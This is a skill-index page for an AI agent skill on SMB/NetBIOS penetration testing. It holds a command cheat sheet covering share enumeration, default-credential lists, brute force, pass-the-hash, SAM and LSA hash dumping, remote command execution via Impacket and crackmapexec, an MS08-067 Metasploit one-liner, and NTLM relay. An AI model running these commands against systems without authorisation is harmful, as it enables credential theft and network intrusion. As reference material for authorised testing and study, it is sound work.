OpenSkillIndex← back to search

Hacktricks-skills smb-pentesting

SMB/NetBIOS pentesting on ports 139/445. Use this skill whenever the user mentions SMB, NetBIOS, file shares, Windows shares, CIFS, port 139, port 445, or needs to enumerate/attack SMB services. This includes share enumeration, credential attacks, command execution via SMB, and post-exploitation. Make sure to use this skill for any Windows network service testing, Active Directory SMB attacks, or when investigating file sharing vulnerabilities.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/pentesting-smb/pentesting-smb/SKILL.MD
source content

SMB Pentesting Skill

A comprehensive skill for Server Message Block (SMB) and NetBIOS security testing on ports 139 and 445.

When to Use This Skill

Use this skill when:

  • Testing SMB services on ports 139 (NetBIOS) or 445 (SMB over IP)
  • Enumerating Windows file shares and network resources
  • Performing credential attacks against SMB services
  • Executing commands via SMB (psexec, smbexec, wmiexec, etc.)
  • Investigating Active Directory SMB vulnerabilities
  • Testing for SMB relay attacks or NTLM theft scenarios
  • Analyzing Samba configurations for misconfigurations

Quick Reference

Port Identification

  • Port 139: NetBIOS Session Service (NBT over IP)
  • Port 445: SMB over IP (direct TCP, no NetBIOS)

Common Tools

  • enum4linux
    / 
    enum4linux-ng
    - SMB enumeration
  • smbmap
    - Share discovery and traversal
  • crackmapexec
    / 
    netexec
    - Multi-purpose SMB testing
  • smbclient
    - Manual share access
  • rpcclient
    - RPC enumeration
  • Impacket tools - Advanced SMB operations

Enumeration Workflow

Step 1: Initial Reconnaissance

Start with basic network scanning to identify SMB services:

# Scan for SMB ports
nmap -p 139,445 -sV <target>

# NetBIOS name resolution
nbtscan -r <network_range>

# SMB version detection
nmap --script smb-enum-* -p 445 <target>

Step 2: Anonymous Enumeration

Try accessing shares without credentials:

# Full enumeration with enum4linux
enum4linux -a <target>
enum4linux-ng -A <target>

# List shares with null session
smbclient -L //<target> -N
smbmap -H <target>

# CrackMapExec enumeration
crackmapexec smb <target> -u '' -p '' --shares
crackmapexec smb <target> --users
crackmapexec smb <target> --groups

# RPC enumeration
rpcclient -U "" -N <target>

Step 3: Share Discovery

Enumerate all available shares:

# List all shares
smbmap -H <target> -P 445
smbmap -R -H <target>  # Recursive listing

# Try common share names manually
for share in C$ D$ ADMIN$ IPC$ PRINT$ FAX$ SYSVOL NETLOGON; do
    smbclient -U '%' -N \\<target>\\$share -c 'ls' 2>&1 | head -5
done

# CrackMapExec share enumeration
crackmapexec smb <target> --shares

Step 4: User and Group Enumeration

# Enumerate users
crackmapexec smb <target> --users
rpcclient -U "" -N <target> -c 'enumdomusers'

# Enumerate groups
crackmapexec smb <target> --groups
rpcclient -U "" -N <target> -c 'enumdomgroups'

# Get logged-on users
crackmapexec smb <target> --loggedon-users

# Impacket user enumeration
lookupsid.py -no-pass <target>

Credential Testing

Null Session and Guest Access

# Test null session
smbclient -L //<target> -N
smbmap -H <target> -u null -p null

# Test guest account
smbmap -H <target> -u guest -p ''
crackmapexec smb <target> -u guest -p '' --shares

Known Credentials

# With username/password
smbmap -H <target> -u <username> -p <password>
crackmapexec smb <target> -u <username> -p <password> --shares

# With NTLM hash (Pass-the-Hash)
crackmapexec smb <target> -u <username> -H <ntlm_hash> --shares
smbclient -U '<username>' --pw-nt-hash <target> -L

# With Kerberos ticket
smbclient --kerberos //<target>/C$
crackmapexec smb <target> -k

Common Credentials to Try

UsernameCommon Passwords
(blank)(blank)
guest(blank)
Administratorpassword, administrator, admin, (blank)
adminpassword, admin, administrator
arcservearcserve, backup
backupbackup, backupexec, arcada
test/lab/demopassword, test, lab, demo

Brute Force (Use Carefully)

# Nmap brute force
nmap --script smb-brute -p 445 <target>

# Hydra
hydra -t 1 -V -f -l <username> -P <wordlist> <target> smb

# CrackMapExec brute force
crackmapexec smb <target> -u <username> -P <wordlist>
crackmapexec smb <target> -u <userlist> -p <password>

# RID brute force
crackmapexec smb <target> -u <username> -p <password> --rid-brute

Command Execution

CrackMapExec Execution

# Execute PowerShell command
crackmapexec smb <target> -u <username> -p <password> -X '$PSVersionTable'

# Execute CMD command
crackmapexec smb <target> -u <username> -p <password> -x whoami

# Pass-the-Hash execution
crackmapexec smb <target> -u <username> -H <ntlm_hash> -x whoami

# Dump SAM database
crackmapexec smb <target> -d <domain> -u <username> -p <password> --sam

# Dump LSASS hashes
crackmapexec smb <target> -d <domain> -u <username> -p <password> --lsa

# Get active sessions
crackmapexec smb <target> -d <domain> -u <username> -p <password> --sessions

# Enumerate disks
crackmapexec smb <target> -d <domain> -u <username> -p <password> --disks

# Get password policy
crackmapexec smb <target> -d <domain> -u <username> -p <password> --pass-pol

Impacket Tools

# psexec.py - Uploads executable to ADMIN$
./psexec.py <username>:<password>@<target>
./psexec.py -hashes <LM:NT> <username>@<target>

# smbexec.py - Fileless execution
./smbexec.py <username>:<password>@<target>
./smbexec.py -hashes <LM:NT> <username>@<target>

# wmiexec.py - Stealthy, no disk touch
./wmiexec.py <username>:<password>@<target>
./wmiexec.py -hashes <LM:NT> <username>@<target>

# dcomexec.py - DCOM-based execution
./dcomexec.py <username>:<password>@<target>
./dcomexec.py -hashes <LM:NT> <username>@<target>

# atexec.py - Task Scheduler execution
./atexec.py <username>:<password>@<target> "command"

Kerberos Authentication

# Sync clock (required for Kerberos)
sudo ntpdate <dc.fqdn>

# Use Kerberos with tools (reads TGT from ccache)
crackmapexec smb <target> -k
smbclient --kerberos //<target>/C$
rpcclient -k <target>

Share Access and File Operations

Connect to Shares

# Connect with null session
smbclient \\<target>\\<share> -N

# Connect with credentials
smbclient \\<target>\\<share> -U <username>

# Connect with NTLM hash
smbclient \\<target>\\<share> -U <username> --pw-nt-hash

# Mount share locally
mount -t cifs //<target>/<share> /mnt/share
mount -t cifs -o "username=<user>,password=<pass>" //<target>/<share> /mnt/share

Download Files

# Download specific file with smbmap
smbmap -R <share> -H <target> -A <filename> -q

# Download all files with smbclient
smbclient \\<target>\\<share>
> mask ""
> recurse
> prompt
> mget *

# Search and download with CrackMapExec
crackmapexec smb <target> -u <username> -p <password> -M spider_plus --share <share>

Upload Files (if writable)

# Upload with smbclient
smbclient \\<target>\\<share>
> put localfile.txt

# Test write access to SYSVOL
smbclient \\<target>\\SYSVOL\\<domain>\\scripts\\
> put test.txt

Vulnerability Scanning

CVE Scanning

# Scan for known SMB vulnerabilities
nmap -p 139,445 --script='smb-vuln*' <target>

# Specific CVE scans
nmap -p 445 --script=smb-vuln-ms08-067.nse <target>  # MS08-067
nmap -p 445 --script=smb-vuln-ms17-010.nse <target>  # EternalBlue
nmap -p 445 --script=smb-vuln-cve2009-3103.nse <target>

# Metasploit search
searchsploit microsoft smb
msfconsole -q -x 'use exploit/windows/smb/ms08_067_netapi; set RHOSTS <target>; exploit'

Samba Configuration Analysis

Check 

/etc/samba/smb.conf
for dangerous settings:

SettingRisk
guest ok = yes
Anonymous access
read only = no
Write access
writable = yes
File modification
create mask = 0777
Full permissions
logon script = script.sh
Script execution
# Check Samba status
smbstatus

# View Samba config
cat /etc/samba/smb.conf

Advanced Techniques

SMB Relay Attack

# Start Responder to capture NTLM hashes
responder -I <interface> -wv

# Relay captured credentials
crackmapexec smb <target> -u <username> -H <captured_hash>

SMB Trap

# Use MitMf for SMB trapping
mitmf -i <interface>

# Plant malicious file to trigger authentication
# (via SMB share or web page with SMB URL)

Registry Access

# Query remote registry with Impacket
reg.py <domain>/<username>@<target> -hashes <LM:NT> query -keyName HKLM -s
reg.py <domain>/<username>@<target> -hashes <LM:NT> query -keyName HKCU -s
reg.py <domain>/<username>@<target> -hashes <LM:NT> query -keyName HKU -s

BloodHound Integration

# Use ShareHound to collect SMB share data
sharehound -ai <target> -au <username> -ap <password> -ns <target>

# Import results to BloodHound for attack path analysis

Safety Considerations

  1. Brute force carefully - Account lockout policies may block access
  2. Test write access - Don't assume read-only shares are safe
  3. Check for honeypots - Unusual share names may indicate traps
  4. Respect scope - Only test authorized targets
  5. Document findings - Track which shares are writable, which users exist

Common Pitfalls

  • Port 139 vs 445: Some tools work on one but not the other
  • Kerberos-only environments: NTLM may return STATUS_NOT_SUPPORTED
  • Clock skew: Kerberos requires synchronized time
  • Hidden shares: May not appear in listings but still accessible
  • ACL vs share permissions: Share may be read-only but NTFS ACLs allow writes

Next Steps After Enumeration

  1. Identify writable shares - Test upload capability
  2. Check for sensitive files - Registry.xml, web.config, credentials
  3. Look for logon scripts - SYSVOL may contain executable scripts
  4. Test lateral movement - Use discovered credentials on other hosts
  5. Check for known vulnerabilities - Run exploit scanners
  6. Analyze ACLs - Use BloodHound for attack path discovery